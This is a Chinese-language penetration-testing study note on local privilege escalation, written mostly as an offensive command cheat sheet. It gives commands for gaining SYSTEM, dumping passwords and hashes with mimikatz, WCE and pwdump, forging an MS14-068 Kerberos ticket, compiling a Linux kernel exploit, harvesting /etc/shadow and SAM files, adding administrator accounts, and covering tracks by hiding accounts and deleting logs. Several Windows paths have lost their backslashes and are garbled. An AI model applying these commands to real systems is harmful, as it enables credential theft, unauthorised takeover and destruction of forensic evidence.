第十章 提权

本地提权  

• 已实现本地低权限账号登录
• 远程溢出
• 直接获得账号密码
• 希望获取更高权限
• 实现对目标进一步控制
• 系统账号之间权限隔离
• 操作系统安全的基础
• 用户空间
• 内核空间
• 系统账号
• 用户账号登陆时获取权限令牌
• 服务账号无需用户登陆已在后台启动服务 

Windows

• user
• Administrator
• System 

Linux

• User
• Root 

 ADMIN提权为SYSTEM  

• Windows system账号
  • 系统设置管理功能
  • SysInternal Suite
  • https://technet.microsoft.com/en-us/sysinternals/bb545027
  • psexec -i -s -d taskmgr
  • at 19:39 /interactive cmd 
  • sc Create syscmd binPath= "cmd /K start" type= own type= interact
  • sc start syscmd 

服务开机自启动

sc \IP config tlntsvr start= auto 
注意:auto前面有一个空格
启动Telnet服务
sc \IP start tlntsvr

注入进程提权  

  • 隐蔽痕迹
  • pinjector.exe
  • http://www.tarasco.org/security/Process_Injector/ 

抓包嗅探  
• Windows

  • Wireshark
  • Omnipeek
  • commview
  • Sniffpass 

• Linux

  • Tcpdump
  • Wireshark
  • Dsniff 

键盘记录 

  • Keylogger
  • 木马窃取 

本地缓存密码  

  • 浏览器缓存的密码
  • IE浏览器
  • Firefox
  • 网络密码
  • 无线密码
  • http://www.nirsoft.net 

• Dump SAM

  • Pwdump
  • /usr/share/windows-binaries/fgdump/ 

WINDOWS身份认证过程


 
 WCE (WINDOWS CREDENTIAL EDITOR)

• /usr/share/wce/
• 需要管理员权限
• wce-universal.exe -l  / -lv
• wce-universal.exe -d
• wce-universal.exe -e / -r
• wce-universal.exe -g
• wce-universal.exe -w   //直接明文显示密码
• LM/NT hash 


 • 从内存读取LM / NTLM hash

• Digest Authentication Package

• NTLM Security Package

• Kerberos Security Package

其他工具

• pwdump localhost
• fgdump
• mimikatz
  • privilege::debug #提升权限
  • sekurlsa::logonPasswords
  • :: 

 利用漏洞提权
• Ms11-080

• Kb2592799
  • https://technet.microsoft.com/library/security/ms11-080      //该站点为Wdindows的MS发布漏洞库
• Pyinstaller                                  //pyinstaller和pywin32是将python程序转换成exe可执行程序的软件
  • https://pypi.python.org/pypi/PyInstaller/2.1
  • python pyinstaller --onefile ms11-080.py
• Pywin32
  • http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/
• MS11-046 
  • DoS 

• Ms14-068(Windows7域环境下,普通域用户提升为域管理员用户)

• 库
  • https://github.com/bidord/pykek                
• ms14-068.py -u user@lab.com -s userSID -d dc.lab.com      //生成票据文件
• 拷贝 TGT_user1@lab.com.ccache 到windows系统
• 本地管理员登陆
  • mimikatz.exe log "kerberos::ptc TGT_user@lab.com.ccache" exit 

 利用漏洞提权

• Ubuntu11.10 
    • http://old-releases.ubuntu.com/releases/11.10/ 
• gcc 
    • sudo apt-cdrom add && sudo apt-get install gcc   //有的旧版本的Ubuntu如果无法从网络获取更新源安装gcc,可以通过iso文件的方式更新
    • gcc 18411.c -o exp         //18411.c为kali里面search出来的一个针对该漏洞的c语言写的程序
• CVE-2012-0056 
    • /proc/pid/mem  
    • kernels >=2.6.39  
    • http://blog.zx2c4.com/749     //详解 CVE-2012-0056

 利用配置不当提权

• 与漏洞提权相比 更常用的方法 
    • 企业环境 
    • 补丁更新的全部已经安装 
    • 输入变量过滤之外更值得研发关注的安全隐患 
    • 以system权限启动 
    • NTFS权限允许users修改删除 

 利用配置不当提权

Windows查看所有用户权限
• icacls • icacls c:windows*.exe /save perm /T     // /T参数代表递归查找,不仅仅只查找c:windows目录 • i586-mingw32msvc-gcc -o admin.exe admin.c     //查找之后通过kali执行此命令生成windows上的反弹.exe的可执行shell需要提前安装(apt-get install mingw32 mingw32-binutils mingw32-runtime)
Linux查看根目录下权限为777的文件全部列出来 • Find • find / -perm 777 -exec ls -l {} ;

  利用配置不当提权

• 应用系统的配置文件 
    • 应用连接数据库的配置文件 

 基本信息收集

• Linux 
    • /etc/resolv.conf 
    • /etc/passwd  
    • /etc/shadow 
    • whoami and who –a 
    • ifconfig -a, iptables -L -n, ifconfig –a, netstat –r 
    • uname –a, ps aux 
    • dpkg -l| head 

• Windows • ipconfig /all , ipconfig /displaydns, netstat -bnao , netstat –r • net view , net view /domain • net user /domain, net user %username% /domain • net accounts, net share • net localgroup administrators username /add • net group "Domain Controllers" /domain • net share name$=C: /unlimited • net user username /active:yes /domain

 WMIC(WINDOWS MANAGEMENT INSTRUMENTATION)

• wmic nicconfig get ipaddress,macaddress     //获取本地的网卡的IPV4地址,IPV6地址以及对应的mac地址
• wmic computersystem get username         //获取当前登录用户
• wmic netlogin get name,lastlogon         //获取最后一次登录用户
• wmic process get caption, executablepath,commandline     //获取系统当前执行的进程,以及进程所在的路径和命令行
• wmic process where name=“cmd.exe" call terminate       //杀掉 cmd.exe
• wmic os get name,servicepackmajorversion       //获取当前操作系统的版本
• wmic product get name,version             //获取当前系统一些程序的版本,如python,c++,go,VMware,xshell等等
• wmic product where name=“name” call uninstall /nointeractive   //卸载某个程序
• wmic share get /ALL       //获取共享相关信息
• wmic /node:"machinename" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1“     //命令行开启远程桌面(Windows10不适用)
• wmic nteventlog get path,filename, writeable   //查看系统可写的日志文件系统

 收集敏感数据

• 商业信息 
• 系统信息 
• Linux 
    • /etc  ;/usr/local/etc 
    • /etc/password  ;/etc/shadow 
    • .ssh  ;.gnupg  公私钥 
    • The e-mail and data files 
    • 业务数据库  ;身份认证服务器数据库 
    • /tmp 
• windows
  • SAM 数据库  ; 注册表文件
  • %SYSTEMROOT% epairSAM
  • %SYSTEMROOT%System32configRegBackSAM
  • 业务数据库 ; 身份认证数据库
  • 临时文件目录
  • UserProfileAppDataLocalMicrosoftWindowsTemporary Internet Files

 隐藏痕迹

• 禁止在登陆界面显示新建账号 
• REG ADD "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinLogonSpecialAccountsUserList" /v uname /T REG_DWORD /D 0 
• del %WINDIR%*.log /a/s/q/f 
• History   
• 日志 
    • auth.log / secure 
    • btmp / wtmp 
    • lastlog / faillog 
• 其他日志和 HIDS 等 
原文地址:https://www.cnblogs.com/steven9898/p/11418889.html